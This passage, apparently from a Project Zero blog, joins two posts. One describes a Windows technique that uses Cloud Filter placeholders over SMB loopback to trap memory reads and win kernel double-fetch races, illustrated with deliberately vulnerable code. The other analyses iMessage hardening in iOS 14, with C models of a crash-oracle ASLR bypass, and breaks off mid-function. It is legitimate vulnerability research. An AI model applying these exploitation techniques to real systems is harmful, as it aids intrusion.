Overview of the operation of the exploitation trick. Memory is read by the application from a mapped file, which causes a page fault. That then requests the contents of the file to be pulled over SMB which goes to the local Cloud Filter Driver and back to the original application where the read is handled.

To use the primitive, we first set up our own cloud provider by registering the sync root directory using the CfRegisterSyncRoot API, configured with the partial hydration policy. Then a 1GiB placeholder can be created in the directory using CfCreatePlaceholders. At this point the file doesn’t have any contents on disk. If we now open and map the placeholder file via the SMB loopback client, the file will not be rehydrated immediately.

Any memory access into the mapping will cause the SMB client to make a request for a 32KiB block, which is passed to our user-mode cloud provider, where we can detect and delay it as necessary. It goes without saying that the contents of the file can also be arbitrary. Based on testing, it doesn’t seem possible to force the read granularity down to the native page size as you can when implementing a custom SMB server; however, you can still trigger requests at native page size boundaries, within the constraint of the larger 32KiB read. It might be possible to modify the file size to trick the SMB server into doing short reads, but this has not been tested. A sample implementation of the cloud provider is available here.

Usage Examples

We now have an exploitation trick which allows us to trap and delay virtual memory reads and writes. The big question is: does this improve the exploitation of vulnerabilities such as double fetches? The answer depends on the actual vulnerability. A quick note: when I use the word page, I mean the unit of memory which causes a request to the SMB server, e.g. 32KiB, not the native page size such as 4KiB.

Let’s take the example given at the start of this blog post. This vulnerability reads the value from the same memory address, lpInputPtr, twice: first for the comparison, then for the size to copy. The problem for exploitation is that the memory trap is one shot, which is one of the limitations of the technique. Once the trap has fired on the read of the size for the comparison, you can delay it indefinitely. However, once you provide the requested memory page and the faulting thread is resumed, the trap won’t fire on the second read; the value will just be read from memory as if it had always been there.

You might wonder whether you could remap the memory page when you detect the first read. Unfortunately, this doesn’t work. When the thread is resumed, it restarts at the faulting instruction and performs the read again, so the following happens:

Directed graph showing states of the double fetch. ① Read Size from Pointer -> ② Page Fault -> ③ Remap Page -> ④ Resume Thread -> Back to ①

As you can tell from the diagram, you end up trapped in an infinite loop, as each freshly remapped page just triggers another page fault ad infinitum. If you don’t perform step ③, the operation completes and there is a time window between resuming the thread, reading the now valid memory for the size comparison, and the second read. However, in this example the time window is likely to be on the order of a couple of instructions, so using our exploitation trick isn’t better than the existing probabilistic approaches. That said, one advantage is that you do know when the read occurs, which allows you to target the brute force window more accurately.

This example is the worst case; what if there were more time between the reads? Another example from the Bochspwn paper is shown below:

PDWORD BufferSize = // controlled user-mode address
PUCHAR BufferPtr  = // controlled user-mode address
PUCHAR LocalBuffer;

LocalBuffer = ExAllocatePool(PagedPool, *BufferSize);  // ① first fetch
if (LocalBuffer != NULL) {
  RtlCopyMemory(LocalBuffer, BufferPtr, *BufferSize);  // ② second fetch
} else {
  // bail out
}

The same double fetch behavior is present; what’s different is that the value is passed to another function, in this case ExAllocatePool, which allocates kernel memory. Depending on the current memory configuration or the size of the requested allocation, there might be a significant time delay between ① and ②. Is there any way we can win the race?

Well, not that I know of, at least not deterministically. But we can exploit one behavior to try to synchronize the reading and writing threads a little. Recall that in order to write to an unresolved page, the contents of the page must first be read from the server. Therefore, to maintain consistency, any thread writing to the unresolved page must generate a page fault and wait on the same lock as another thread which is just reading from the page, as shown in the following diagram:

Diagram showing separate read and write threads accessing the same pointer, one for read and one for write. When the page fault occurs both threads enter the same lock and they are both resumed once the lock is released.

By synchronizing the reading and writing threads, you give yourself a reasonable chance of causing a write to happen during the time window for exploitation. This is still a probabilistic approach; it depends on the scheduler. For example, the write thread might be woken before the read thread, which will cause the pointer to always take the final value. Or the read thread could run to completion before the write thread is ever scheduled, so the value never changes. There might be some scheduler magic, such as using multiple reader or writer threads or selecting appropriate priorities, which you could exploit to guarantee read and write ordering, but I’d be surprised if anything like that were reliable across multiple Windows 10 systems. I’d be very interested to hear from anyone with better ideas on how to improve the reliability of this.

One approach you might be wondering about is unaligned access, say splitting the value across two separate pages. From a microarchitecture perspective, it’s likely that the read will be split into two parts, first touching one page and then the other. However, remember how the page fault works: it generates an exception which causes a handler to execute in the kernel. At this point any work the faulting instruction has already done is discarded while the kernel deals with the page fault. When the thread is resumed, it restarts the faulting instruction, which reissues the appropriate micro-operations to read from the unaligned address. Unless the compiler generated two loads for the unaligned access (which might happen on some architectures), there is no way I know of to restart the memory access instruction partway through.

This all seems slightly downbeat on the usefulness of the exploitation trick. The thing is, there are as many different types of vulnerability as there are fish in the sea (if you’re reading this in 2100, I apologize for the acidification of the seas which killed all marine life; choose your own apocalypse-appropriate proverb instead). For example, if we modify the original example as follows:

PDWORD lpInputPtr = // controlled user-mode address
UCHAR  LocalBuffer[256];

if (lpInputPtr[0] > sizeof(LocalBuffer) || lpInputPtr[1] != 2) {
  return STATUS_INVALID_PARAMETER;
}

RtlCopyMemory(LocalBuffer, lpInputPtr, *lpInputPtr);

The check now ensures that the local buffer is large enough and that the second DWORD in the buffer is set to 2. The second field might represent the buffer type, with type 2 being the only valid type for this request. If you check the compiler output for this code, such as on Godbolt, the difference in native code is 2 or 3 instructions. This would not seem to materially improve the odds of winning the TOCTOU race with a naïve probabilistic approach. But with our exploitation trick we can now build a deterministic exploit.

Diagram showing the memory accesses for the two reads, where a page fault allows us to modify the original size value. The central part of the diagram shows a previous page which only contains the Size field, and the next page which contains the Type field and the rest of the structure.

The diagram above shows how we can achieve this deterministic exploit. We can place the Size field on a different page from the rest of the input buffer, while the buffer is still contiguous in virtual memory. The first page (N-1) should already be faulted into memory and contain a Size value which is smaller than the LocalBuffer size. We let the read of the size ① complete normally.

Next, the code reads the Type field, which is on page N ②. This page isn’t currently in memory, so accessing it causes a page fault ③. This requires the kernel to read the contents from the file, which we can detect and delay. When the read is detected, we have as long as we need to modify the Size field to contain a value larger than the LocalBuffer size ④. Finally, we complete the read, which restarts the thread at the Type field read instruction ⑤. The code continues and now reads the overly large Size field, causing memory corruption.

The key takeaway is that if, between the double fetch points, the code touches any user-mode memory under your control other than the value being double fetched, it should be possible to convert that into a deterministic exploit. It doesn’t matter whether the target system only has a single CPU, what the kernel’s scheduling algorithm is, how many instructions are between the double fetch points, or what day of the week it is; it should “just work”.

The follow-up blog post on double-fetch exploitation gives some figures for exploitability. For the kinds of examples shown up to now, when the right timing window is chosen, the chance of success can hit 100% after some number of seconds. So while we can get 100% reliability on some classes of the same bug, in the best case this isn’t an improvement beyond being deterministic.

All examples up to now only demonstrate the exploitation of what the blog post refers to as arithmetic races. The blog also mentions a second class of bug, binary races, which are harder to exploit and never reach 100% success. Let’s look at the example in the blog and see whether our exploitation trick would do better.

PVOID* UserPointer = // controlled user-mode address

__try {
   ProbeForWrite(*UserPointer, sizeof(STRUCTURE), 1);             // ① first fetch
   RtlCopyMemory(*UserPointer, LocalPointer, sizeof(STRUCTURE));  // ② second fetch
} __except (EXCEPTION_EXECUTE_HANDLER) {
   return GetExceptionCode();
}

On the face of it this doesn’t look massively different from the previous examples; however, in this case the destination pointer is being changed rather than the size. The ProbeForWrite kernel API checks that the pointer is at a user-mode address and that the memory is writable. This is a commonly used idiom to verify that a user-supplied pointer is not pointing into kernel memory.

If the pointer value is changed between ① and ② from a user-mode address to a kernel-mode address, the example will overwrite kernel memory. This behavior is harder to exploit probabilistically, as there are only two valid values of the pointer: a user-mode address or a kernel-mode address. If you’re brute forcing the pointer value, you can end up with both fetches reading a user-mode pointer even though it might have changed to a kernel pointer in between the fetches.

Fortunately, due to the call to ProbeForWrite this is trivial to exploit if you can trap on user memory access as shown in the following diagram:

Diagram showing access to the UserPointer which is then passed to ProbeForWrite. We can generate a page fault when probing the buffer which can allow us to modify the original pointer.

From the diagram, the first read from UserPointer is made ① and the resulting pointer value is passed to ProbeForWrite. The ProbeForWrite API first checks whether the pointer is in the user-mode address space, then probes each page of memory up to the size of the length parameter ②. If a page is invalid or not writable, an exception is generated and caught by the example’s __except block. This gives us our exploit opportunity: we can use the exploitation trick on one of the user-mode pages being probed, which will cause ProbeForWrite to generate a page fault we can trap ③. As the address being probed is not the one storing the pointer, we can modify the stored pointer to contain a kernel-mode address while the request is trapped ④. The result is that we can deterministically win the race.

Of course, I’ve been focussing on kernel double fetches as that’s what originally drew me to look for this behavior. There are many scenarios where this can be used to aid exploitation of user-mode applications. The most obvious one is where a service is sharing memory with a lower privileged application. An example of this sort of issue was a double fetch in the DfMarshal COM marshaler. The COM marshaler shared a memory section between processes, so it was possible to provide a section which exploited our trick. In the end this trick wasn’t necessary, as the logic of the vulnerable code allowed me to create an infinite loop to extend the double fetch window. However, if that hadn’t been possible, we could have used this trick to detect and delay the code at the point where the handle could be switched.

Another more subtle use is where a privileged process reads memory from a less privileged process. This might be explicit use of APIs such as ReadProcessMemory or it could be indirect, for example querying for the process’ command line using NtQueryInformationProcess will read out memory locations under our control.

The thing to remember with this exploitation trick is that it can be used to open up the window to win a timing race. In this respect it’s similar to my previous work on oplocks, but for memory access instead. In fact, the memory access might be incidental to the vulnerable code; it doesn’t have to be a memory double fetch, or necessarily even a TOCTOU vulnerability. For example, you might be trying to win a race between two file paths with symbolic links. As long as the vulnerable code can be made to probe a user-mode address we control, you can use it as a timing signal and to widen the exploitation window.


I’ve described an exploitation trick combining SMB and the Cloud File API which can aid in demonstrating exploitation of certain types of application and kernel vulnerabilities. It’s possible that there are other ways of achieving a similar result with APIs I haven’t looked at, but for now this is the best approach I’ve come up with. It allows you to trap on reads from user-mode memory, detect when the access occurs and delay the read for at least 60 seconds. Examples of code to implement the SMB and Cloud File API tricks are available here.

It’s worth just reiterating some more of the limitations of this exploitation trick before we conclude.

  • Can’t be used in a sandbox, only with normal user privileges.
  • Only allows a one shot for any page mapped from the file. If something else (such as AV) tries to read that page or from the file then the trap may fire early.
  • Can’t detect the exact location of a read; it’s limited to a granularity of 4KiB. For local access via the Cloud File API, a read will always populate the next 7 pages as well, as part of the 32KiB read. If accessing a custom SMB server, the read size can be reduced to 4KiB. This would prevent exploitation of certain bugs which require precise trapping on only a small area within a larger structure.
  • Can only detect writes indirectly, can’t specifically trap on a write.

From a practical perspective, the trick presented here doesn’t significantly improve the win rates for traditional kernel double fetches outlined in the Bochspwn paper. Realistically, for most of those classes of vulnerability you’d probably want to use a probabilistic approach, if only for its simplicity of implementation. However, the trick is applicable to other bug classes where the memory trap is used as a deterministic timing signal adjunct to the vulnerability.

The one-shot nature of the trick also means it offers no real benefit for exploiting simple double fetch code paths. Also, more complex code might read and write a memory address more than once before reaching the vulnerable code, which could make managing traps more difficult.

A Look at iMessage in iOS 14

Posted By Samuel Groß, Project Zero

On December 20, Citizen Lab published “The Great iPwn”, detailing how “Journalists [were] Hacked with Suspected NSO Group iMessage ‘Zero-Click’ Exploit”. Of particular interest is the following note: “We do not believe that [the exploit] works against iOS 14 and above, which includes new security protections”. Given that it has also been almost exactly one year since we published the Remote iPhone Exploitation blog post series, in which we described how an iMessage 0-click exploit can work in practice and gave a number of suggestions on how similar attacks could be prevented in the future, now seemed like a great time to dig into the security improvements in iOS 14 in more detail and explore how Apple has hardened their platform against 0-click attacks.

The content of this blog post is the result of a roughly one-week reverse engineering project, mostly performed on an M1 Mac mini running macOS 11.1, with the results, where possible, verified to also apply to iOS 14.3, running on an iPhone XS. Due to the nature of this project and the limited timeframe, it is possible that I have missed some relevant changes or made mistakes interpreting some results. Where possible, I’ve tried to describe the steps necessary to verify the presented results, and would appreciate any corrections or additions.

The blog post will start with an overview of the major changes Apple implemented in iOS 14 which affect the security of iMessage. Afterwards, and mostly for the readers interested in the technical details, each of the major improvements is described in more detail while also providing a walkthrough of how it was reverse engineered. At least for the technical details, it is recommended to briefly review the blog post series from last year for a basic introduction to iMessage and the exploitation techniques used to attack it.


Memory corruption based 0-click exploits typically require at least the following pieces:

  1. A memory corruption vulnerability, reachable without user interaction and ideally without triggering any user notifications
  2. A way to break ASLR remotely
  3. A way to turn the vulnerability into remote code execution
  4. (Likely) A way to break out of any sandbox, typically by exploiting a separate vulnerability in another operating system component (e.g. a userspace service or the kernel)

With iOS 14, Apple shipped a significant refactoring of iMessage processing, and made all four parts of the attack harder. This is mainly due to three central changes:

1. The BlastDoor Service

One of the major changes in iOS 14 is the introduction of a new, tightly sandboxed “BlastDoor” service which is now responsible for almost all parsing of untrusted data in iMessages (for example, NSKeyedArchiver payloads). Furthermore, this service is written in Swift, a (mostly) memory safe language which makes it significantly harder to introduce classic memory corruption vulnerabilities into the code base.

The following diagram shows the rough new iMessage processing pipeline, with the name of the respective service process shown at the top of each box.

The iMessage processing pipeline in iOS 14 and macOS Big Sur. An iMessage arrives in apsd as a push notification from Apple’s servers. From there, it is first passed to identityservicesd, which decrypts its payload using the local iMessage private key, then to imagent. Imagent then delegates the majority of the parsing work to the BlastDoor service. Afterwards, if the iMessage contains any attachments, they are downloaded from iCloud servers by IMTransferAgent. If the iMessage contains plugin data (such as a URL with a preview image), the serialized plugin data is again processed by the BlastDoor service and a preview message is generated from it. Finally, IMDPersistenceAgent stores the iMessage into the messages database, triggers a user notification, and returns to imagent, which sends the delivery receipt to the iMessage servers and thus to the sender.

As can be seen, the majority of the processing of complex, untrusted data has been moved into the new BlastDoor service. Furthermore, this design, with its 7+ involved services, allows fine-grained sandboxing rules to be applied; for example, only the IMTransferAgent and apsd processes are required to perform network operations. As such, all services in this pipeline are now properly sandboxed (with the BlastDoor service arguably being sandboxed the strongest).

2. Re-randomization of the Dyld Shared Cache Region

Historically, ASLR on Apple’s platforms had one architectural weakness: the shared cache region, containing most of the system libraries in a single prelinked blob, was only randomized per boot, and so would stay at the same address across all processes. This turned out to be especially critical in the context of 0-click attacks, as it allowed an attacker, able to remotely observe process crashes (e.g. through timing of automatic delivery receipts), to infer the base address of the shared cache and as such break ASLR, a prerequisite for subsequent exploitation steps.

However, with iOS 14, Apple has added logic to specifically detect this kind of attack, in which case the shared cache is re-randomized for the targeted service the next time it is started, thus rendering this technique useless. This should make bypassing ASLR in a 0-click attack context significantly harder or even impossible (apart from brute force) depending on the concrete vulnerability.

3. Exponential Throttling to Slow Down Brute Force Attacks

To limit an attacker’s ability to retry exploits or brute force ASLR, the BlastDoor and imagent services are now subject to a newly introduced exponential throttling mechanism enforced by launchd, causing the interval between restarts after a crash to double with every subsequent crash (up to an apparent maximum of 20 minutes). With this change, an exploit that relied on repeatedly crashing the attacked service would now likely require on the order of multiple hours to roughly half a day to complete, instead of a few minutes.

The remainder of this blog post will now look at each of these three changes in greater depth.

The BlastDoor Service

The new BlastDoor service and its role in the processing of iMessages can be studied by following the flow of an incoming iMessage. On the wire, a simple text iMessage would look something like this, encoded as a binary plist:


{
    // Group UUID
    gid = "008412B9-A4F7-4B96-96C3-70C4276CB2BE";
    // Group protocol version
    gv = 8;
    // Chat participants
    p =     (
        "mailto:[email protected]",
        "mailto:[email protected]"
    );
    // Participants version
    pv = 0;
    // Message being replied to, usually the last message in the chat
    r = "6401430E-CDD3-4BC7-A377-7611706B431F";
    // The plain text content
    t = "Hello World!";
    // Probably some other version number
    v = 1;
    // The rich text content
    x = "<html><body>Hello World!</body></html>";
}


As such, the minimal steps required to parse it are:

  1. If necessary, decompress the binary data
  2. Decode the plist from its binary serialization format
  3. Extract its various fields and ensure they have the correct type
  4. Decode the `x` key if present, using an XML decoder

Previously, all of this work happened in imagent. With iOS 14, however, it has all moved into the new BlastDoor service. The main processing flow still starts in imagent, which receives the raw, but already decrypted, payload bytes from identityservicesd (part of the IDS framework) in -[IMDiMessageIDSDelegate service:account:incomingTopLevelMessage:fromID:messageContext:]. Messages are then more or less immediately forwarded to the BlastDoor service through +[IMBlastdoor sendDictionary:withCompletionBlock:], which creates the reply handler block and then calls -[IMMessagesBlastDoorInterface diffuseTopLevelDictionary:resultHandler:]. At that point, processing ends up in Swift code that deserializes the binary payload and sends it to the BlastDoor service over XPC.

Inside BlastDoor, the work mostly happens in BlastDoor.framework and MessagesBlastDoorService. As most of it is written in Swift, it is fairly unpleasant to reverse engineer statically (no symbols, many virtual calls, Swift runtime code sprinkled all over the place), but fortunately that is also not really necessary for the purpose of this blog post. However, it is worth noting that while the high-level control flow logic is written in Swift, some of the parsing steps still involve the existing Objective-C or C implementations. For example, XML is parsed by libxml, and the NSKeyedArchiver payloads by the Objective-C implementation of NSKeyedUnarchiver.

The responses from BlastDoor can be seen by breaking on the reply handler function in imagent (the function can be found in +[IMBlastdoor sendDictionary:withCompletionBlock:] or by searching for XREFs to the string “Blastdoor response %p received (command: %hhu, guid: %@)” in IMDaemonCore.framework). A typical BlastDoor response for a simple text message is shown below:

(lldb) po $x2


    metadata: BlastDoor.Metadata(

        messageGUID: D391CC96-9CC6-44C6-B827-1DEB0F252529,

        timestamp: Optional(1610108299117662350),

        wantsDeliveryReceipt: true,

        wantsCheckpointing: false,

        storageContext: BlastDoor.Metadata.StorageContext(

            isFromStorage: false, isLastFromStorage: false



    messageSubType: MessageType.textMessage(BlastDoor.Message(

        plainTextBody: Optional("Hello World"),

        plainTextSubject: nil,

        content: Optional(BlastDoor.AttributedString(

            attributes: [


                    range: Range(0..<11), direction: WritingDirection.natural



                    range: Range(0..<11), partNumber: 0



            string: "Hello World"


        _participantDestinationIdentifiers: [

            "mailto:[email protected]",

            "mailto:[email protected]"


        attributionInfo: []


    encryptionType: BlastDoor.TextMessage.EncryptionType.pair_ec,

    replyToGUID: Optional(6401430E-CDD3-4BC7-A377-7611706B431F),

    _threadIdentifierGUID: nil,

    _expressiveSendStyleIdentifier: nil,

    _groupID: Optional("008412B9-A4F7-4B96-96C3-70C4276CB2BE"),

    currentGroupName: nil,

    groupParticipantVersion: Optional(0),

    groupProtocolVersion: Optional(8),

    groupPhotoCreationTime: nil,

    messageSummaryInfo: nil,

    nicknameInformation: nil,

    truncatedNicknameRecordKey: nil


One can roughly associate every field in this data structure with parts of the on-wire iMessage format. For example, the plainTextBody field contains the content of the `t` field, while the content field corresponds to the content of the `x` field.

Besides simple text messages, iMessages can additionally contain attachments (essentially arbitrary files which are encrypted and temporarily uploaded to iCloud) as well as rather complex serialized NSKeyedArchiver archives, which have been the source of bugs in the past.

For these types of iMessages, the following additional parsing steps are necessary:

  1. Unpack attachment metadata (NSKeyedArchiver format)
  2. Download attachments from iCloud server
  3. Deserialize NSKeyedArchiver plugin archives and generate a preview for the notification

As an example, consider what happens when a user sends a link to a website over iMessage. In that case, the sending device will first render a preview of the webpage and collect some metadata about it (such as the title and page description), then pack those fields into an NSKeyedArchiver archive. This archive is then encrypted with a temporary key and uploaded to the iCloud servers. Finally, the link as well as the decryption key are sent to the receiver as part of the iMessage. In order to create a useful user notification about the incoming iMessage, this data has to be processed by the receiver on a 0-click code path. As that again involves a fair amount of complexity, it is also done inside BlastDoor: after receiving the BlastDoor reply from above and realizing that the message contains an attachment, imagent first instructs IMTransferAgent to download and decrypt the iCloud attachment. Afterwards, it will call into -[IMTranscodeController decodeiMessageAppPayload:bundleID:completionBlock:blockUntilReply:] which forwards the relevant data to the IMTranscoderAgent, which then proceeds into +[IMAttachmentBlastdoor sendBalloonPluginPayloadData:withBundleIdentifier:completionBlock:] and finally calls -[IMMessagesBlastDoorInterface defuseBalloonPluginPayload:withIdentifier:resultHandler:].

In the BlastDoor service, the plugin data decoding is then again performed in Swift and dispatched to the corresponding plugin type, as determined by the plugin id. For RichLinks, processing ends up in LinkPresentation.MessagesPayload.init(dataRepresentation:), which deserializes the NSKeyedArchiver payload and extracts the preview image and URL metadata from it in order to generate a preview message.


The sandbox profile can be found in System/Library/Sandbox/Profiles/ and appears to be identical on iOS and macOS. It can be studied statically (it is attached at the end of this blog post) or dynamically, for example by using the sandbox-exec tool:

> echo "(allow process-exec (literal \"$(pwd)/test\"))" >> ./

> clang -o test test.c   # try to open files, network connections, etc.

> sandbox-exec -f ./ ./test

The sandbox profile states:

;;; This profile contains the rules necessary to make BlastDoor as close to

;;; compute-only as possible, while still remaining functional.

And indeed, the sandbox profile is quite tight:

  • only a handful of local IPC services, namely diagnosticd, logd, opendirectoryd, syslogd, and notifyd, can be reached
  • almost all file system interaction is blocked
  • any interaction with IOKit drivers (historically a big source of vulnerabilities) is forbidden
  • outbound network access is denied

Furthermore, the profile makes use of syscall filtering to restrict the interactions with the core kernel. However, as of now the syscall filter seems to be in “permissive” mode:

;; To be uncommented once the system call whitelist is complete...

;; (deny syscall-unix (with send-signal SIGKILL))

As such, the BlastDoor service is still allowed to perform any syscall, but it is to be expected that the syscall filtering will soon be put into “enforcement mode”, which would further boost its effectiveness.

Crash Monitoring?

An interesting side effect of the new processing pipeline is that imagent is now able to detect when an incoming message caused a crash in BlastDoor (it will receive an XPC error). Even more interesting is the fact that imagent appears to be informing Apple’s servers about such events, as can be seen by setting a breakpoint on -[APSConnectionServer handleSendOutgoingMessage:] in apsd, the daemon responsible for implementing Apple’s push services (on top of which iMessage is built). Displaying the outgoing message will show the following:

(lldb) po [$x2 dictionaryRepresentation]
{
    APSCritical = 1;
    APSMessageID = 543;
    APSMessageIdentifier = 1520040396;
    APSMessageTopic = "";
    APSMessageUserInfo =     {
        c = 115;
        fR = 13500;
        fRM = "";
        fU = {length = 16, bytes = 0x3a4912626c9645f98cb26c7c2d439520};
        i = 1520040396;
        nr = 1;
        t = {length = 32, bytes = ... };
        ua = "[macOS,11.1,20C69,Macmini9,1]";
        v = 7;
    };
    APSOutgoingMessageSenderTokenName = 501;
    APSPayloadFormat = 1;
    APSTimeout = 120;
    APSTimestamp = "2021-01-06 19:52:10 +0000";
}

As can be seen, imagent is apparently informing the iMessage servers that the message with the UUID 0x3a4912626c9645f98cb26c7c2d439520 (fU key) has caused a crash in BlastDoor.

It is unclear what the purpose of this is without access to the server’s code. While these notifications may simply be used for statistical purposes, they would also give Apple a fairly clear signal about brute-force attacks against iMessage and a somewhat weaker signal about any failed exploits against the BlastDoor service.

In my experiments, after observing one of these crash notifications, the server would start directly sending delivery receipts to the sender for messages that hadn't actually been processed by the receiver yet. Possibly this is another, independent effort to break the crash oracle technique by confusing the sender, but that is hard to verify without access to the code running on the server. In any case, it is worth noting that this “spoofing” of delivery receipts by the server is generally possible as the message UUID, which is more or less the only content of a delivery receipt, is part of the non-end2end encrypted payload and is thus known to the server (break on -[APSConnectionServer handleSendOutgoingMessage:] and inspect outgoing iMessages to verify this, the UUID will be in the U key, while the e2e-encrypted data will be in the P key). This is most likely necessary so the server can track which messages have already been delivered and which ones it still needs to keep around for delivery in the future.

Shared Cache Resliding

Previously, when exploiting an iMessage memory corruption bug, a “crash oracle” could be used to reveal the location of the shared cache region in memory: the attacker would trigger the memory corruption bug in a way that would cause an access to a memory location somewhere in the region 0x180000000 - 0x280000000 (where the shared cache can be mapped). If the memory was valid, no crash would occur and imagent would then send a delivery receipt to the attacker. However, if a crash occurred, no such receipt would be delivered, informing the attacker that the address was unmapped. Through clever selection of the queried addresses, the location of the shared cache could be revealed in logarithmic time, with only about 20 messages.
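The logarithmic query count can be illustrated with a small, self-contained C simulation. This is a sketch under stated assumptions, not the original exploit code: the remote target is replaced by a hypothetical local function, probe_is_mapped(), where one call stands in for one iMessage and its delivery receipt; the shared cache start is assumed to be 4 KiB aligned; and the attacker is assumed to already know one mapped address inside the cache (the coarse first phase of finding such an address is omitted).

```c
#include <stdbool.h>
#include <stdint.h>

/* Range in which the shared cache can be mapped, as stated in the text. */
#define CACHE_RANGE_LO 0x180000000ULL
#define CACHE_RANGE_HI 0x280000000ULL
/* Assumption for illustration only: the cache start is 4 KiB aligned. */
#define GRANULARITY 0x1000ULL

/* Hypothetical local stand-in for the remote target. In the real technique
 * each probe is one iMessage: a delivery receipt means "mapped", a missing
 * receipt means the process crashed on an unmapped address. */
typedef struct {
    uint64_t cache_start;   /* hidden from the attacker */
    uint64_t cache_end;     /* exclusive */
    unsigned messages_sent; /* number of probes issued so far */
} target_t;

static bool probe_is_mapped(target_t *t, uint64_t addr) {
    t->messages_sent++;
    return addr >= t->cache_start && addr < t->cache_end;
}

/* Binary search for the first mapped address. Assumes one mapped address
 * `known_mapped` is already known and that the cache is contiguous.
 * Invariant: `lo` is unmapped, `hi` is mapped. */
static uint64_t find_cache_start(target_t *t, uint64_t known_mapped) {
    uint64_t lo = CACHE_RANGE_LO - GRANULARITY;      /* below the range: treated as unmapped */
    uint64_t hi = known_mapped & ~(GRANULARITY - 1); /* still mapped, since the start is aligned */
    while (hi - lo > GRANULARITY) {
        uint64_t mid = lo + ((hi - lo) / GRANULARITY / 2) * GRANULARITY;
        if (probe_is_mapped(t, mid))
            hi = mid;
        else
            lo = mid;
    }
    return hi; /* lo + GRANULARITY == hi, so hi is the first mapped address */
}
```

With a 4 GiB search range and the assumed 4 KiB granularity, the loop needs at most log2(2^32 / 2^12) = 20 probes, which is in line with the “about 20 messages” figure above; a different granularity, or counting the omitted coarse phase, would shift that number slightly.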

However, with iOS 14 Apple has added a mechanism to re-randomize the location of the shared cache region for an “attacked” process, thus breaking a fundamental assumption of this technique and rendering it ineffective. This is significant as the crash oracle technique was one of very few, if not the only, fairly generic ASLR bypass techniques usable in 0-click iMessage attacks.

To understand how the shared cache resliding works, one can start by looking at the kernel. In iOS 14, the kernel can now have two active shared cache regions: the “regular” region and a “reslided” region. During an attack, the following then happens:

  1. When an attacker attempts to use a crash-oracle-based technique, the attacked process quickly ends up accessing unmapped memory in the range 0x180000000 - 0x280000000 (where the shared cache is mapped) and crashes
  2. The kernel handles the segmentation fault generated by the CPU, and sets a specific flag in the crash info that signals that the crash happened inside the shared cache region
  3. At the same time, the kernel will mark the currently active reslided shared cache region (if one exists) as stale, causing it to be recreated and thus re-randomized the next time it is used
  4. launchd (as the parent process of the crashed service) receives the crash info, notices the OS_REASON_FLAG_SHAREDREGION_FAULT flag, and sets the ReslideSharedCache property on the service associated with the crashed process (see `launchctl procinfo $pid` and search for `reslide shared cache = 1`)
  5. The next time the service is restarted, launchd then adds the POSIX_SPAWN_RESLIDE attribute for posix_spawn due to the ReslideSharedCache property
  6. In the kernel, this flag now causes the newly created process to be given the reslided shared cache image. However, as no active reslided region currently exists (the previous one was marked as stale in step 3.), a new one is created at a newly randomized address.
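The six steps above can be condensed into a toy C model of the kernel and launchd state for a platform binary. All type and function names are hypothetical and do not correspond to XNU or launchd identifiers, and the random source is a deterministic stand-in so that the behavior is reproducible.

```c
#include <stdbool.h>
#include <stdint.h>

/* Toy model of the resliding flow for a platform binary (hypothetical names). */
typedef struct {
    bool exists;    /* is there an active reslided region? */
    bool stale;     /* marked stale after a shared-cache fault (step 3) */
    uint64_t slide; /* slide of the reslided region */
} reslided_region_t;

typedef struct {
    uint64_t regular_slide;         /* the "regular" shared cache slide */
    reslided_region_t reslided;
    uint64_t (*random_slide)(void); /* source of fresh slides */
} kernel_t;

typedef struct {
    bool reslide_shared_cache; /* models launchd's ReslideSharedCache property */
} service_t;

/* Steps 2-4: a fault in the shared cache region was reported for this service. */
static void on_shared_region_fault(kernel_t *k, service_t *svc) {
    if (k->reslided.exists)
        k->reslided.stale = true;     /* step 3: invalidate the current reslided region */
    svc->reslide_shared_cache = true; /* step 4: launchd sets the property */
}

/* Steps 5-6: launchd respawns the service; returns the slide it receives. */
static uint64_t spawn_service(kernel_t *k, const service_t *svc) {
    if (!svc->reslide_shared_cache)
        return k->regular_slide;
    if (!k->reslided.exists || k->reslided.stale) {
        k->reslided.slide = k->random_slide(); /* new randomized address */
        k->reslided.exists = true;
        k->reslided.stale = false;
    }
    return k->reslided.slide;
}

/* Deterministic stand-in for a random source, so the demo is reproducible. */
static uint64_t demo_random_slide(void) {
    static uint64_t n = 0;
    return ++n * 0x4000;
}
```

Every crash that lands in the shared cache region marks the reslided region stale, so each respawn sees a fresh slide and the answers from one oracle query say nothing about the next.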

The result of this is that whenever an attacker attempts to use a crash oracle to break ASLR, the attacked service receives a different shared cache region every time it is launched, thus preventing the attack from succeeding. For the time being, this feature appears to be active only on iOS, but it can be expected to come to macOS as well.

While this mechanism would in principle also protect 3rd party apps from similar attacks, protection for those is currently somewhat weaker, likely in order to first evaluate the real-world performance impact of this change (the shared cache is a significant performance optimization of the OS). In particular, step 3 is currently only performed if the crashing process is a platform binary (essentially binaries that ship with the OS and are directly signed by Apple) such as the services handling iMessages. However, for 3rd party processes, it would only happen if the global vm_shared_region_reslide_restrict is set to zero:

/*
 * Flag to control what processes should get shared cache randomize resliding
 * after a fault in the shared cache region:
 *
 * 0 - all processes get a new randomized slide
 * 1 - only platform processes get a new randomized slide
 */

This flag is controlled by the vm_shared_region_reslide_restrict bootarg, which currently seems to be set to one. In essence, for 3rd party apps this means:

  1. When the attacked process first crashes, the kernel will still set the OS_REASON_FLAG_SHAREDREGION_FAULT flag, and launchd will add the ReslideSharedCache property, but the current reslided region won’t be invalidated
  2. The service is then restarted and now uses the “reslided” shared cache region
  3. When the service crashes the next time, and if that service is the only one currently using the reslided shared cache region (which should usually be the case, but could possibly be influenced by the attacker), the region’s refcount drops to zero, and the shared cache region is marked for removal.
  4. However, removal will only actually happen after two minutes. As such, if the service is restarted within two minutes, it will receive the same shared cache region at the same location in memory.
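The weaker third-party behavior hinges on the deferred two-minute removal. A minimal sketch of that window follows; as before, the names are hypothetical, and the caller passes in the “fresh” slide instead of it being generated randomly.

```c
#include <stdbool.h>
#include <stdint.h>

#define REMOVAL_DELAY_SECS 120 /* "two minutes", from the text above */

/* Toy model of the reslided region for a third-party service, which is
 * never marked stale on a fault. Names are hypothetical. */
typedef struct {
    bool exists;
    unsigned refcount;  /* processes currently using the region */
    uint64_t slide;
    uint64_t remove_at; /* removal deadline, meaningful when refcount == 0 */
} region_t;

/* The service crashes: drop its reference and schedule deferred removal. */
static void region_release(region_t *r, uint64_t now) {
    if (r->refcount > 0 && --r->refcount == 0)
        r->remove_at = now + REMOVAL_DELAY_SECS;
}

/* The service is (re)started at time `now`; `fresh_slide` stands in for a
 * newly randomized slide and is only used if a new region must be created. */
static uint64_t region_acquire(region_t *r, uint64_t now, uint64_t fresh_slide) {
    if (r->exists && r->refcount == 0 && now >= r->remove_at)
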